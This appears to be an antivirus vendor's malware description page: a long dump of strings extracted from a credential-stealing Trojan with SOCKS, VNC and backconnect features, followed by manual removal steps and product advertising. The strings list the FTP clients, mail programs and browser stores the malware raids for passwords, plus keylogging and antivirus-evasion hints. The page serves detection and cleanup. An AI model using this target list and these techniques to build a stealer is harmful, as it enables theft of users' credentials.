HttpEndRequestW
ADVAPI32.DLL
Init in Browser = %u
Init in Shell = %u
[Socks] Failt connect BC [%s:%u]
[Socks] Fail parse param: %s
#cert
[Pony] Fail Get Pass
DL_EXEC LOAD ERROR: %u = %s
DL_EXEC Status [Pipe]: %u-%u-%u
DL_EXEC Status[Local]: %u = %u
Start Socks addr: %s
Start Socks Status[Pipe]: %u-%u-%u
Start Socks Status[Local]: %u
Start VNC addr: %s
Start VNC Status[Pipe]: %u-%u-%u
Start VNC Status[Local]: %u
msvcrt.dll
%0.8X%0.8X%c
/work/1.php?sid=%0.8X%0.8X%0.4X%0.4X%0.2X%0.2X%0.4X
firefox.exe
explorer.exe
SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\
%Program Files%\Mozilla Firefox\
mozsqlite3.dll
sqlite3_open
sqlite3_exec
sqlite3_close
sqlite3_free
Software\Microsoft\Windows\CurrentVersion\Internet Settings
Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3
hXXp://
Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)
\\.\pipe\
PID: %u [%0.2u:%0.2u:%0.2u]
[BC] Cmd Ver Error
[BC] Wait Ping error %u[%u]
[BC] Fail Connect: %u
[BC] Fail read cmd
[BC] Cmd need reauth
[BC] cmd error: %u
[BC] Cmd need disconnect
ntdll.dll
Common Files\Doctor Web
Doctor Web
McAfee.com
DrWeb
SOFTWARE\Policies\Microsoft\Windows\Safer\CodeIdentifiers\
SOFTWARE\Policies\Microsoft\Windows\Safer\CodeIdentifiers\0\Paths\
Kernel32.dll
gdiplus.dll
GdiplusShutdown
SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\
<HTTPMail_Password2
<IMAP_Password2
<SMTP_Password2
<POP3_Password2
account.cfg
account.cfn
Dir #%u
.oeaccount
Software\Microsoft\Windows Live Mail
\Microsoft\Windows Live Mail
Software\Microsoft\Windows Mail
\Microsoft\Windows Mail
PopPort
PopPassword
SmtpServer
SmtpPort
SmtpAccount
SmtpPassword
abe2869f-9b47-4cd9-a358-c22904dba7f7
MS IE FTP Passwords
Last Server Port
Last Server Pass
Server.Port
Server.User
Server.Host
Server.Pass
Password
Software\Far\Plugins\FTP\Hosts
Software\Far2\Plugins\FTP\Hosts
Software\Far Manager\Plugins\FTP\Hosts
Software\Far\SavedDialogHistory\FTPHost
Software\Far2\SavedDialogHistory\FTPHost
Software\Far Manager\SavedDialogHistory\FTPHost
\win.ini
WS_FTP
\Ipswitch\WS_FTP
\GlobalSCAPE\CuteFTP
sm.dat
\GlobalSCAPE\CuteFTP Pro
\GlobalSCAPE\CuteFTP Lite
\CuteFTP
CUTEFTP
Software\GlobalSCAPE\CuteFTP 6 Home\QCToolbar
Software\GlobalSCAPE\CuteFTP 6 Professional\QCToolbar
Software\GlobalSCAPE\CuteFTP 7 Home\QCToolbar
Software\GlobalSCAPE\CuteFTP 7 Professional\QCToolbar
Software\GlobalSCAPE\CuteFTP 8 Home\QCToolbar
Software\GlobalSCAPE\CuteFTP 8 Professional\QCToolbar
\Sites.dat
\Quick.dat
\History.dat
Software\BPFTP\Bullet Proof FTP\Main
Software\BulletProof Software\BulletProof FTP Client\Main
Software\BPFTP\Bullet Proof FTP\Options
Software\BulletProof Software\BulletProof FTP Client\Options
Software\BPFTP
\SmartFTP
Favorites.dat
History.dat
Software\TurboFTP
\TurboFTP
addrbk.dat
quick.dat
Port
Login
PasswordType
profiles.xml
\FTP Explorer
Software\FTP Explorer\FTP Explorer\Workspace\MFCToolBar-224
Software\FTP Explorer\Profiles
FtpSite.xml
RushSite.xml
\FTPRush
bitkinex.ds
NDSites.ini
Software\LeechFTP
bookmark.dat
CLSID\{11C1D741-A95B-11d2-8A80-0080ADB32FF4}\InProcServer32
sites.db
servers.xml
\FTPGetter
ESTdb2.dat
\Estsoft\ALFTP
QData.dat
SM.arch
FTP  .Link\shell\open\command
NppFTP.xml
Software\MAS-Soft\FTPInfo\Setup
ServerList.xml
\FTPInfo
NovaFTP.db
\INSoftware\NovaFTP
\sites.xml
ftplast.osd
\SharedSettings.ccs
\SharedSettings.sqlite
\SharedSettings_1_0_5.ccs
\SharedSettings_1_0_5.sqlite
\32BitFtp.ini
FTPCON
FTP CONTROL
FTPVoyager.ftp
\RhinoSoft.com
FTPVoyager.qc
FTPVoyager.Archive
SiteInfo.QFP
WinFTP
DeluxeFTP
sites.xml
Staff-FTP
sites.ini
FreshFTP
Software\FlashPeak\BlazeFtp\Settings
LastPassword
LastPort
BlazeFtp
site.dat
\BlazeFtp
GoFTP
Connections.txt
3D-FTP
\3D-FTP
SOFTWARE\Classes\TypeLib\{F9043C88-F6F2-101A-A3C9-08002B2F49FB}\1.2\0\win32
EasyFTP
FTPNow
FTP Now
FTPShell
ftpshell.fsi
ftpsite.ini
FTPList.db
My FTP
project.ini
Mailbox.ini
FTP Navigator
FTP Commander
ftplist.txt
Software\Sota\FFFTP
Software\Sota\FFFTP\Options
Software\FTPWare\COREFTP\Sites
FtpPort
Software\Cryer\WebSitePublisher
_Password
Software\NCH Software\ClassicFTP\FTPAccounts
FtpPassword
_FtpPassword
FtpServer
FtpUserName
FtpDirectory
Software\FTPClient\Sites
Software\SoftX.org\FTPClient\Sites
PortNumber
PassWord
Software\South River Technologies\WebDrive\Connections
Software\LinasFTP\Site Manager
FTP destination password
FTP destination server
FTP destination port
FTP destination user
FTP destination catalog
FTP profiles
Msi.dll
{74FF1730-B1F2-4D88-926B-1568FAE61DB7}
\PocoSystem.ini
accounts.ini
sites.dat
\LeapWare\LeapFTP
unleap.exe
leapftp
FtpIniName
Software\Ghisler\Windows Commander
wcx_PTF.ini
\sitemanager.xml
\recentservers.xml
\filezilla.xml
"password" : "
"password":"
\drives.js
\ExpanDrive\favorites.js
\ExpanDrive\drives.js
wiseftpsrvs.ini
wisePTF.ini
wiseftpsrvs.bin
SOFTWARE\Classes\TypeLib\{CB1F2C0F-8094-4AAC-BCF5-41A64E27F777}
SOFTWARE\Classes\TypeLib\{9EA55529-E122-4757-BC79-E4825F80732C}
FTP Count
FTP File%u
Robo-FTP
SOFTWARE\%s\FTPServers
user.config
.duck
SiteServer %u\Host
SiteServer %u\WebUrl
SiteServer %u\Remote Directory
SiteServer %u-User
SiteServer %u-User PW
SiteServer %u\SFTP
Keychain
Software\Nico Mak Computing\WinZip\FTP
PK11_GetInternalKeySlot
sqlite3.dll
sqlite3_prepare
sqlite3_step
sqlite3_column_bytes
sqlite3_column_blob
SELECT hostname, encryptedUsername, encryptedPassword FROM moz_logins
PTF://
signons.sqlite
\profiles.ini
PathToExe
\Mozilla\Firefox\
Firefox
Software\Mozilla
fireFTPsites.dat
\Mozilla\SeaMonkey\
SeaMonkey
\Mozilla\Profiles\
Mozilla
password 51:b:
SMTP Password
HTTPMail Password
NNTP Password
IMAP Password
POP3 Password
SMTP Password2
HTTPMail Password2
NNTP Password2
IMAP Password2
POP3 Password2
IMAP Port
SMTP Port
POP3 Port
SMTP User
HTTPMail Server
HTTPMail User Name
HTTP Server URL
HTTP User
SMTP User Name
SMTP Server
SMTP Email Address
{X-X-X-XX-XXXXXX}
inetcomm server passwords
outlook account manager passwords
Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Microsoft Outlook Internet Settings
Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook
Pstorec.dll
[VNC] EXEC: %s
IE WND [%0.8X] ENABLED: %s VISIBLED: %s
[%u] {%u, %u} {%u, %u} {%0.8X, %0.8X} = %s
[VDESK] Read CMD %u[%u]
[VDESK] NOT AUTH CMD %u
GetAsyncKeyState
USER32.DLL
GetKeyboardState
GetKeyState
?WINMM.DLL
?DSOUND.DLL
ZwConnectPort
NTDLL.DLL
[VNC] PROCESS=%s
\explorer.exe
[VNC] SearchApp Status = %u
[VNC] FileName = %s
[VNC] CmdLine = %s
[VNC] W64 Redir OLD=%u
[VNC] CreateProcess Status = %u (%u)
Chrome_WidgetWin_1
SysShadow
Chrome_WidgetWin_0
Dxtrans.dll
d3d11.dll
d3d9.dll
OPENGL32.dll
d2d1.dll
d3d10core.dll
d3d10.dll
d3d10_1core.dll
d3d10_1.dll
RegCloseKey
RegNotifyChangeKeyValue
ShellExecuteA
DeleteUrlCacheEntry
EnumWindows
ActivateKeyboardLayout
SetViewportOrgEx
RegEnumKeyExA
RegCreateKeyA
RegCreateKeyExA
RegOpenKeyExA
CryptImportKey
CryptDestroyKey
RegOpenKeyA
CertOpenSystemStoreA
CertDeleteCertificateFromStore
CertAddCertificateContextToStore
CertCloseStore
CertEnumCertificatesInStore
CertDuplicateCertificateContext
PFXExportCertStoreEx
SHDeleteKeyA
FindFirstUrlCacheEntryA
FindNextUrlCacheEntryA
FindCloseUrlCache
FindNextUrlCacheEntryW
FindFirstUrlCacheEntryW
WinExec
KERNEL32.dll
MSVCRT.dll
IPHLPAPI.DLL
AVIFIL32.dll
GetWindowsDirectoryW
CallNamedPipeA
ConnectNamedPipe
CreateNamedPipeW
DisconnectNamedPipe
CreateNamedPipeA
GetWindowsDirectoryA
COMDLG32.dll
<&<,<2<\<
%Program Files%\Java\jre6\bin\jqs.exe
iexplore.exe
chrome.exe
\System32\kernel32.dll
\System32\kernelbase.dll
\ThemeApiPort


Remove it with Ad-Aware

  1. Click (here) to download and install Ad-Aware Free Antivirus.
  2. Update the definition files.
  3. Run a full scan of your computer.


Manual removal*

  1. Scan a system with an anti-rootkit tool.
  2. Terminate malicious process(es) (How to End a Process With the Task Manager):

    regsvr32.exe:212

  3. Delete the original Trojan file.
  4. Delete or disinfect the following files created/modified by the Trojan:

    %Documents and Settings%\%current user%\Local Settings\Temp\OfumVism\IfarZozip.dat (269 bytes)

  5. Delete the following value(s) in the autorun key (How to Work with System Registry):

    [HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
    "IfarZozip" = "regsvr32.exe %Documents and Settings%\All Users\Application Data\IfarZozip\IfarZozip.dat"

  6. Reboot the computer.

*Manual removal may cause unexpected system behaviour and should be performed at your own risk.

No votes yet

x

Our best antivirus yet!

Fresh new look. Faster scanning. Better protection.

Enjoy unique new features, lightning fast scans and a simple yet beautiful new look in our best antivirus yet!

For a quicker, lighter and more secure experience, download the all new adaware antivirus 12 now!

Download adaware antivirus 12
No thanks, continue to lavasoft.com
close x

Discover the new adaware antivirus 12

Our best antivirus yet

Download Now